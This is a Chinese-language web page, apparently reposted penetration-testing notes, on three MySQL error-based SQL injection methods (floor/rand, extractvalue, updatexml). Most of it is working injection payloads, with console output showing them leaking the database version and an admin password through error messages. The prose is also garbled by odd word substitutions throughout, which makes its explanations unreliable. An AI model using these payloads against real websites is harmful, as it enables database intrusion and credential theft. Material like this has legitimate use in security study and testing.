|
|
|
联系客服020-83701501

关于Mysql注入过程中的三种报错方式

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
关于Mysql注入过程中的三种报错行动

放点副本的笔记,Mysql在实验语句的时辰会抛出特别动态信息,而php+mysql架构的网站每每又将错误代码阐扬解析在页面上,如许概略颠末结构以下三种方法获得特定命据。

理论测试环境:

Default
1234567 mysql> show tables;+----------------+| Tables_in_test |+----------------+| admin          || article        |+----------------+

Default
12345678 mysql> describe admin;+-------+------------------+------+-----+---------+----------------+| Field | Type             | Null | Key | Default | Extra          |+-------+------------------+------+-----+---------+----------------+| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment || user  | varchar(50)      | NO   |     | NULL    |                || pass  | varchar(50)      | NO   |     | NULL    |                |+-------+------------------+------+-----+---------+----------------+

Default
12345678 mysql> describe article;+---------+------------------+------+-----+---------+----------------+| Field   | Type             | Null | Key | Default | Extra          |+---------+------------------+------+-----+---------+----------------+| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment || title   | varchar(50)      | NO   |     | NULL    |                || content | varchar(50)      | NO   |     | NULL    |                |+---------+------------------+------+-----+---------+----------------+

1、颠末floor报错

概略颠末以下一些垄断代码

Default
12 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))xfrom information_schema.tables group by x)a);

Default
123 and (select count(*) from (select 1 union select null union select !1)xgroup by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

举比方下:
首儿女行畸形查询:

Default
123456 mysql> select * from article where id = 1;+----+-------+---------+| id | title | content |+----+-------+---------+|  1 | test  | do it   |+----+-------+---------+

如果id输入存在注入的话,概略颠末以下语句终止报错。

Default
123 mysql> select * from article where id = 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

概略看到腐败爆出了Mysql的版本,假设需要查询此外数据,概略颠末修正version()所在地位语句终止查询。
比方我们需要查询筹划员用户名和密码:
Method1:

Default
1234 mysql> select * from article where id = 1 and (select 1 from(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))xfrom information_schema.tables group by x)a);ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

Default
1234 mysql> select * from article where id = 1 and (select count(*)from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2、ExtractValue
测试语句以下

Default
1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

理论测试过程

Default
123 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3、UpdateXml
测试语句

Default
1 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

理论测试过程

Default
123 mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

All, thanks foreign guys.

link:http://blog.ourren.com/2012/11/03/pentest_method_of_mysql_error.html

本文由Internet安全攻防钻研室(www.91ri.org)动态安全小组收集整顿,转载请说明出处!

数安新闻+更多

证书相关+更多